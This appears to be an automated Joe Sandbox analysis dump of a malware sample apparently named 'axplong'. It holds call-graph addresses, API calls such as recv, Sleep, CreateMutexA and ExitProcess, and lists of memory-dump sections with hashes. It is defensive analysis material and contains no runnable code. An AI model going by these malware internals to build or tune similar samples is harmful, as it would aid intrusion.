12373->12377 12375 6491a0 RtlAllocateHeap 12374->12375 12376 648e64 12375->12376 12378 632440 RtlAllocateHeap 12376->12378 12379 648da6 12377->12379 12380 648d7c 12377->12380 12386 648d8d 12378->12386 12384 64d312 RtlAllocateHeap 12379->12384 12379->12386 12380->12376 12381 648d87 12380->12381 12383 64d312 RtlAllocateHeap 12381->12383 12382 666b9a RtlAllocateHeap 12385 648e6e 12382->12385 12383->12386 12384->12386 12386->12382 12387 648e1d 12386->12387 12388 63211a 12389 64c62c InitializeCriticalSectionEx 12388->12389 12390 632124 12389->12390 12391 64d57e RtlAllocateHeap 12390->12391 12392 63212e 12391->12392 12433 6399e8 12435 6399fc 12433->12435 12436 639a38 12435->12436 12437 647870 RtlAllocateHeap 12436->12437 12438 639aa4 12437->12438 12439 635b20 4 API calls 12438->12439 12440 639aac 12439->12440 12441 638a60 4 API calls 12440->12441 12442 639abd 12441->12442 12443 648150 RtlAllocateHeap 12442->12443 12444 639acc 12443->12444 12445 647870 RtlAllocateHeap 12444->12445 12446 639bd9 12445->12446 12447 635b20 4 API calls 12446->12447 12448 639be1 12447->12448 12449 638a60 4 API calls 12448->12449 12450 639bf2 12449->12450 12451 648150 RtlAllocateHeap 12450->12451 12452 639c01 12451->12452 12453 64cff7 12454 64d007 12453->12454 12455 64d0ab RtlWakeAllConditionVariable 12454->12455 12456 64d0af 12454->12456 12487 632dc0 12488 632de8 12487->12488 12489 64c5bb 2 API calls 12488->12489 12490 632df3 12489->12490 12504 63dfd0 recv 12505 63e032 recv 12504->12505 12506 63e067 recv 12505->12506 12508 63e0a1 12506->12508 12507 63e1c3 12508->12507 12509 64c5dc GetSystemTimePreciseAsFileTime 12508->12509 12510 63e1fe 12509->12510 12511 64c19a 5 API calls 12510->12511 12512 63e268 12511->12512 12553 633fa0 12554 633fe2 12553->12554 12555 634092 12554->12555 12556 63404c 12554->12556 12559 633ff5 12554->12559 12557 633ea0 4 API calls 12555->12557 12560 6335a0 12556->12560 12557->12559 12561 64d312 RtlAllocateHeap 12560->12561 12562 6335d6 12561->12562 12566 63360e 12562->12566 12567 632ca0 12562->12567 12564 63365e 12565 632bc0 4 API calls 12564->12565 12564->12566 12565->12566 12566->12559 12568 632cdd 12567->12568 12569 64be0f InitOnceExecuteOnce 12568->12569 12570 632d06 12569->12570 12571 632d11 12570->12571 12572 632d48 12570->12572 12576 64be27 12570->12576 12571->12564 12574 632400 4 API calls 12572->12574 12575 632d5b 12574->12575 12575->12564 12577 64be33 12576->12577 12585 6328c0 12577->12585 12579 64be53 12580 64bea3 12579->12580 12581 64be9a 12579->12581 12583 632aa0 5 API calls 12580->12583 12595 64bdaf 12581->12595 12584 64be9f 12583->12584 12584->12572 12586 647f30 RtlAllocateHeap 12585->12586 12587 63290f 12586->12587 12588 632670 RtlAllocateHeap 12587->12588 12589 632927 12588->12589 12590 63294d 12589->12590 12591 666b9a RtlAllocateHeap 12589->12591 12590->12579 12592 632976 12591->12592 12593 6637dc RtlAllocateHeap 12592->12593 12594 6329a4 12593->12594 12594->12579 12596 64cb61 InitOnceExecuteOnce 12595->12596 12597 64bdc7 12596->12597 12598 64bdce 12597->12598 12599 666beb 4 API calls 12597->12599 12598->12584 12600 64bdd7 12599->12600 12600->12584 12610 6359ae 12612 635971 12610->12612 12611 647f30 RtlAllocateHeap 12611->12612 12612->12610 12612->12611 12614 647870 RtlAllocateHeap 12612->12614 12615 635aed 12612->12615 12616 635640 12612->12616 12614->12612 12620 635770 12616->12620 12624 6356a9 12616->12624 12617 63583a 12618 648070 RtlAllocateHeap 12617->12618 12618->12620 12619 647f30 RtlAllocateHeap 12619->12624 12621 635810 12620->12621 12622 666b9a RtlAllocateHeap 12620->12622 12621->12612 12623 635844 12622->12623 12624->12617 12624->12619 12624->12620 12625 63a5b2 12626 63a5ba 12625->12626 12627 63a879 12626->12627 12628 63a68d 12626->12628 12629 666b9a RtlAllocateHeap 12627->12629 12631 647f30 RtlAllocateHeap 12628->12631 12630 63a87e 12629->12630 12632 63a883 Sleep CreateMutexA 12630->12632 12633 666b9a RtlAllocateHeap 12630->12633 12634 63a833 12631->12634 12635 63a8be 12632->12635 12633->12632 12636 6343b0 12637 64be0f InitOnceExecuteOnce 12636->12637 12638 6343ca 12637->12638 12639 6343d1 12638->12639 12640 666beb 4 API calls 12638->12640 12641 6343e4 12640->12641 12642 6485b0 12643 648610 12642->12643 12643->12643 12644 6475d0 RtlAllocateHeap 12643->12644 12645 648629 12644->12645 12646 648e70 RtlAllocateHeap 12645->12646 12647 648644 12645->12647 12646->12647 12648 648e70 RtlAllocateHeap 12647->12648 12650 648699 12647->12650 12649 6486e1 12648->12649 12651 6743b2 12652 6743bf 12651->12652 12653 6743cc 12651->12653 12654 667443 RtlAllocateHeap 12652->12654 12656 6743d8 12653->12656 12657 667443 RtlAllocateHeap 12653->12657 12655 6743c4 12654->12655 12658 6743f9 12657->12658 12659 666b8a RtlAllocateHeap 12658->12659 12659->12655 12660 635bbd 12662 635bbf 12660->12662 12661 635c27 12662->12661 12663 666b9a RtlAllocateHeap 12662->12663 12664 635c57 12663->12664 12664->12664 12665 647f30 RtlAllocateHeap 12664->12665 12667 635d4e 12665->12667 12666 635db6 12667->12666 12668 666b9a RtlAllocateHeap 12667->12668 12669 635de2 12668->12669 12670 635f0e 12669->12670 12671 666b9a RtlAllocateHeap 12669->12671 12672 635f2b 12671->12672 12673 647f30 RtlAllocateHeap 12672->12673 12674 635f99 12673->12674 12675 647f30 RtlAllocateHeap 12674->12675 12676 635fcd 12675->12676 12677 647f30 RtlAllocateHeap 12676->12677 12678 635ffe 12677->12678 12679 647f30 RtlAllocateHeap 12678->12679 12680 63602f 12679->12680 12681 647f30 RtlAllocateHeap 12680->12681 12683 636060 12681->12683 12682 636578 12683->12682 12684 666b9a RtlAllocateHeap 12683->12684 12685 6365a3 12684->12685 12686 647870 RtlAllocateHeap 12685->12686 12687 636676 12686->12687 12688 635b20 4 API calls 12687->12688 12689 63667c 12688->12689 12690 635b20 4 API calls 12689->12690 12691 636681 12690->12691 12692 632280 4 API calls 12691->12692 12693 636699 12692->12693 12694 647870 RtlAllocateHeap 12693->12694 12695 636702 12694->12695 12696 635b20 4 API calls 12695->12696 12697 63670d 12696->12697 12698 632280 4 API calls 12697->12698 12705 636727 12698->12705 12699 636822 12700 647f30 RtlAllocateHeap 12699->12700 12702 63686c 12700->12702 12701 647870 RtlAllocateHeap 12701->12705 12703 647f30 RtlAllocateHeap 12702->12703 12706 6368b3 12703->12706 12704 635b20 4 API calls 12704->12705 12705->12699 12705->12701 12705->12704 12707 632280 4 API calls 12705->12707 12707->12705 12718 632180 12719 632190 12718->12719 12720 63218b 12718->12720 12721 632194 12719->12721 12725 6321ac 12719->12725 12722 667443 RtlAllocateHeap 12721->12722 12723 632199 12722->12723 12726 666b8a RtlAllocateHeap 12723->12726 12724 6321bc 12725->12724 12727 6321e1 12725->12727 12728 6321fa 12725->12728 12729 6321a4 12726->12729 12730 667443 RtlAllocateHeap 12727->12730 12731 6321f1 12728->12731 12733 667443 RtlAllocateHeap 12728->12733 12732 6321e6 12730->12732 12734 666b8a RtlAllocateHeap 12732->12734 12735 632207 12733->12735 12734->12731 12736 666b8a RtlAllocateHeap 12735->12736 12737 632212 12736->12737 12771 64bd80 12774 64bcbb 12771->12774 12773 64bd96 12775 6322a0 RtlAllocateHeap 12774->12775 12776 64bccf 12775->12776 12776->12773 9992 63a786 9993 63a7a0 9992->9993 10000 63a7c2 9992->10000 9994 63a87e 9993->9994 9993->10000 9996 63a883 Sleep CreateMutexA 9994->9996 10016 666b9a 9994->10016 9999 63a8be 9996->9999 9998 63a833 10001 647f30 10000->10001 10004 647f4e 10001->10004 10006 647f74 10001->10006 10002 64805e 10024 6491a0 10002->10024 10004->9998 10005 648063 10027 632440 10005->10027 10006->10002 10008 647fc8 10006->10008 10009 647fed 10006->10009 10008->10005 10019 64d312 10008->10019 10012 64d312 RtlAllocateHeap 10009->10012 10014 647fd9 10009->10014 10012->10014 10013 666b9a RtlAllocateHeap 10013->10002 10014->10013 10015 648040 10014->10015 10015->9998 10017 666b26 RtlAllocateHeap 10016->10017 10018 666ba9 10017->10018 10020 632440 10019->10020 10021 64d331 10020->10021 10031 6637dc 10020->10031 10021->10014 10120 64c0e9 10024->10120 10028 63244e 10027->10028 10029 6637dc RtlAllocateHeap 10028->10029 10030 632483 10029->10030 10032 632483 10031->10032 10033 6637e9 10031->10033 10032->10014 10033->10032 10034 663816 10033->10034 10037 66a0b1 10033->10037 10046 668a66 10034->10046 10038 66a0be 10037->10038 10039 66a0cc 10037->10039 10038->10039 10042 66a0e3 10038->10042 10049 667443 10039->10049 10043 66a0de 10042->10043 10044 667443 RtlAllocateHeap 10042->10044 10043->10034 10045 66a0d4 10044->10045 10052 666b8a 10045->10052 10047 66acb5 RtlAllocateHeap 10046->10047 10048 668a7e 10047->10048 10048->10032 10055 66a688 10049->10055 10114 666b26 10052->10114 10054 666b96 10054->10043 10056 66a692 10055->10056 10058 667448 10056->10058 10066 66d6ef 10056->10066 10058->10045 10059 66a6d3 10060 66a713 10059->10060 10061 66a6db 10059->10061 10074 66a35f 10060->10074 10070 66acb5 10061->10070 10065 66acb5 RtlAllocateHeap 10065->10058 10069 66d6fc 10066->10069 10067 66d727 RtlAllocateHeap 10068 66d73a 10067->10068 10067->10069 10068->10059 10069->10067 10069->10068 10071 66acc0 10070->10071 10073 66acdb 10070->10073 10072 667443 RtlAllocateHeap 10071->10072 10071->10073 10072->10073 10073->10058 10075 66a3cd 10074->10075 10078 66a305 10075->10078 10077 66a3f6 10077->10065 10079 66a311 10078->10079 10082 66a4e6 10079->10082 10081 66a333 10081->10077 10083 66a4f5 10082->10083 10084 66a51c 10082->10084 10083->10084 10086 66f21f 10083->10086 10084->10081 10087 66f29f 10086->10087 10090 66f235 10086->10090 10088 66f2ed 10087->10088 10091 66acb5 RtlAllocateHeap 10087->10091 10089 66f390 RtlAllocateHeap 10088->10089 10104 66f2fb 10089->10104 10090->10087 10092 66f268 10090->10092 10098 66acb5 RtlAllocateHeap 10090->10098 10093 66f2c1 10091->10093 10094 66f28a 10092->10094 10099 66acb5 RtlAllocateHeap 10092->10099 10095 66acb5 RtlAllocateHeap 10093->10095 10097 66acb5 RtlAllocateHeap 10094->10097 10096 66f2d4 10095->10096 10100 66acb5 RtlAllocateHeap 10096->10100 10101 66f294 10097->10101 10103 66f25d 10098->10103 10105 66f27f 10099->10105 10106 66f2e2 10100->10106 10107 66acb5 RtlAllocateHeap 10101->10107 10102 66f35b 10108 66acb5 RtlAllocateHeap 10102->10108 10109 66edfc RtlAllocateHeap 10103->10109 10104->10102 10110 66acb5 RtlAllocateHeap 10104->10110 10111 66eefa RtlAllocateHeap 10105->10111 10112 66acb5 RtlAllocateHeap 10106->10112 10107->10087 10113 66f361 10108->10113 10109->10092 10110->10104 10111->10094 10112->10088 10113->10084 10115 66a688 RtlAllocateHeap 10114->10115 10116 666b31 10115->10116 10117 666b26 RtlAllocateHeap 10116->10117 10118 666b3f 10116->10118 10119 666b96 10117->10119 10118->10054 10119->10054 10123 64c053 10120->10123 10122 64c0fa 10126 6322a0 10123->10126 10125 64c065 10125->10122 10127 6637dc RtlAllocateHeap 10126->10127 10128 6322d7 10127->10128 10128->10125 12777 636d85 12778 636d92 12777->12778 12779 636dc5 12778->12779 12780 636d9a 12778->12780 12782 647f30 RtlAllocateHeap 12779->12782 12781 647f30 RtlAllocateHeap 12780->12781 12783 636dbb 12781->12783 12782->12783 12784 636e91 12783->12784 12785 666b9a RtlAllocateHeap 12783->12785 12786 636eb3 12785->12786 12787 63cb8d 12792 63cb98 12787->12792 12788 63cd1d 12789 63cd45 12791 666b9a RtlAllocateHeap 12789->12791 12790 647870 RtlAllocateHeap 12790->12792 12793 63cd4a 12791->12793 12792->12788 12792->12789 12792->12790 12794 635b20 4 API calls 12792->12794 12800 648150 RtlAllocateHeap 12792->12800 12802 648e70 RtlAllocateHeap 12792->12802 12803 638f60 12792->12803 12795 647870 RtlAllocateHeap 12793->12795 12794->12792 12796 63cda2 12795->12796 12798 635b20 4 API calls 12796->12798 12799 63cdad 12798->12799 12816 63c990 12799->12816 12800->12792 12802->12792 12804 638fb0 12803->12804 12805 647870 RtlAllocateHeap 12804->12805 12806 638fbf 12805->12806 12807 635b20 4 API calls 12806->12807 12808 638fca 12807->12808 12808->12808 12809 647f30 RtlAllocateHeap 12808->12809 12810 63901c 12809->12810 12811 648150 RtlAllocateHeap 12810->12811 12813 63902e 12811->12813 12812 6390ae 12812->12792 12813->12812 12814 666b9a RtlAllocateHeap 12813->12814 12815 6390da 12814->12815 12831 63c9fd 12816->12831 12817 647870 RtlAllocateHeap 12817->12831 12818 63cd1d 12819 63cd45 12821 666b9a RtlAllocateHeap 12819->12821 12820 635b20 4 API calls 12820->12831 12823 63cd4a 12821->12823 12822 638f60 4 API calls 12822->12831 12824 647870 RtlAllocateHeap 12823->12824 12826 63cda2 12824->12826 12825 648150 RtlAllocateHeap 12825->12831 12827 635b20 4 API calls 12826->12827 12828 63cdad 12827->12828 12829 63c990 4 API calls 12828->12829 12830 648e70 RtlAllocateHeap 12830->12831 12831->12817 12831->12818 12831->12819 12831->12820 12831->12822 12831->12825 12831->12830

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 358 66645b-666468 call 66a1c2 361 66648a-66649c call 66649d ExitProcess 358->361 362 66646a-666478 GetPEB 358->362 362->361 363 66647a-666489 362->363 363->361
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,0066645A,?,?,?,?,?,006674AE), ref: 00666497
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: 6a2086715e39a2b411c1855a89153dfc6c9da44e033511cbff8f3e0916e723e6
                                                                                                                                                                                                        • Instruction ID: 9664f8d0a22810691a977c4a3768b108ff00b0fdd093a6152ed6938ff365ecf6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a2086715e39a2b411c1855a89153dfc6c9da44e033511cbff8f3e0916e723e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAE08630140608BFCE267B28E859A993B5BEF51344F10C818F804463B2CF25EC81C991

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 35a6e6e81fd445b90ec68a4b45eaedd38b5880d907595b6c3c3940ef7c473854
                                                                                                                                                                                                        • Instruction ID: e855ed073b19f17411289e5b212a1e935c41a128b2b24900e1f1f8d553c46046
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35a6e6e81fd445b90ec68a4b45eaedd38b5880d907595b6c3c3940ef7c473854
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66315B71A04200CBEB089B7CECC476EBB77DF86314F204269E1519B7D6C77599819BA1

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 22 639e74-639e94 26 639ec2-639ede 22->26 27 639e96-639ea2 22->27 30 639ee0-639eec 26->30 31 639f0c-639f2b 26->31 28 639ea4-639eb2 27->28 29 639eb8-639ebf call 64d593 27->29 28->29 34 63a85b 28->34 29->26 36 639f02-639f09 call 64d593 30->36 37 639eee-639efc 30->37 32 639f59-63a846 call 647f30 31->32 33 639f2d-639f39 31->33 38 639f3b-639f49 33->38 39 639f4f-639f56 call 64d593 33->39 41 63a883-63a8c4 Sleep CreateMutexA 34->41 42 63a85b call 666b9a 34->42 36->31 37->34 37->36 38->34 38->39 39->32 52 63a8d7-63a8d8 41->52 53 63a8c6-63a8c8 41->53 42->41 53->52 54 63a8ca-63a8d5 53->54 54->52
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
